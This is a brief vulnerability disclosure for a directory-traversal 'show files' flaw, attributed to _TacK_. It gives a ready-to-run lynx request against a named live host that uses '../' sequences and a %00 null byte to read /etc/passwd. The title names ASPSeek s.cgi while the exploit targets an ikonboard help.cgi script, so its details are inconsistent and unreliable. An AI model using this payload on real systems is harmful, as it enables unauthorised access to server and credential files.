Name : SWSoft ASPSeek s.cgi script "show files" Vulnerability. Problem: Adding the string "/../../../../" to an URL allows an attacker to view any file on the server, and also list directories within the server. Exploit: lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00 by: _TacK_ (TacK@ole.com) (Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3)